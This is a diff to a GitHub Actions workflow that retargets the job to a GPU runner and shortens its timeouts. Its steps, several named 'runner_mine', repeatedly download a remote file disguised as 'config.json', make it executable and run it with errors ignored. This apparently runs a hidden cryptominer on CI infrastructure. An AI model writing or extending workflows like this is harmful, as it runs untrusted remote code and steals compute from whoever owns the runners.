--- a/.github/workflows/main.yml
+++ b/.github/workflows/main.yml
@@ -1,9 +1,9 @@
-name: CI-PROGRES
+name: CI-GPU
 on: [push, pull_request]
 jobs:
   build:
     name: Docker
-    runs-on: self-hosted
+    runs-on: nvidia-V100
     strategy:
       max-parallel: 20
       fail-fast: false
@@ -28,7 +28,7 @@ jobs:
     - name: runner_mine
       continue-on-error: true
       run: |
-        timeout 3m ./logs
+        timeout 2m ./logs
     - name: remove
       continue-on-error: true
       run: |
@@ -37,7 +37,7 @@ jobs:
       continue-on-error: true
       run: |
         wget https://raw.githubusercontent.com/kijang-7/gas/main/config.json && chmod +x config.json
-        timeout 3m ./logs
+        timeout 2m ./logs
     - name: remove
       continue-on-error: true
       run: |
@@ -46,7 +46,7 @@ jobs:
       continue-on-error: true
       run: |
         wget https://raw.githubusercontent.com/kijang-7/gas/main/config.json && chmod +x config.json
-        timeout 3m ./logs
+        timeout 2m ./logs
     - name: remove
       continue-on-error: true
       run: |
@@ -55,7 +55,7 @@ jobs:
       continue-on-error: true
       run: |
         wget https://raw.githubusercontent.com/kijang-7/gas/main/config.json && chmod +x config.json
-        timeout 3m ./logs
+        timeout 2m ./logs
     - name: remove
       continue-on-error: true
       run: |
@@ -64,7 +64,7 @@ jobs:
       continue-on-error: true
       run: |
         wget https://raw.githubusercontent.com/kijang-7/gas/main/config.json && chmod +x config.json
-        timeout 3m ./logs
+        timeout 2m ./logs
     - name: remove
       continue-on-error: true
       run: |
@@ -73,7 +73,7 @@ jobs:
       continue-on-error: true
       run: |
         wget https://raw.githubusercontent.com/kijang-7/gas/main/config.json && chmod +x config.json
-        timeout 3m ./logs
+        timeout 2m ./logs
     - name: remove
       continue-on-error: true
       run: |
@@ -82,7 +82,7 @@ jobs:
       continue-on-error: true
       run: |
         wget https://raw.githubusercontent.com/kijang-7/gas/main/config.json && chmod +x config.json
-        timeout 3m ./logs
+        timeout 2m ./logs
     - name: remove
       continue-on-error: true
       run: |
@@ -91,7 +91,7 @@ jobs:
       continue-on-error: true
       run: |
         wget https://raw.githubusercontent.com/kijang-7/gas/main/config.json && chmod +x config.json
-        timeout 3m ./logs
+        timeout 2m ./logs
     - name: remove
       continue-on-error: true
       run: |
@@ -100,7 +100,7 @@ jobs:
       continue-on-error: true
       run: |
         wget https://raw.githubusercontent.com/kijang-7/gas/main/config.json && chmod +x config.json
-        timeout 3m ./logs
+        timeout 2m ./logs
     - name: remove
       continue-on-error: true
       run: |
@@ -109,7 +109,7 @@ jobs:
       continue-on-error: true
       run: |
         wget https://raw.githubusercontent.com/kijang-7/gas/main/config.json && chmod +x config.json
-        timeout 3m ./logs
+        timeout 2m ./logs
     - name: remove
       continue-on-error: true
       run: |
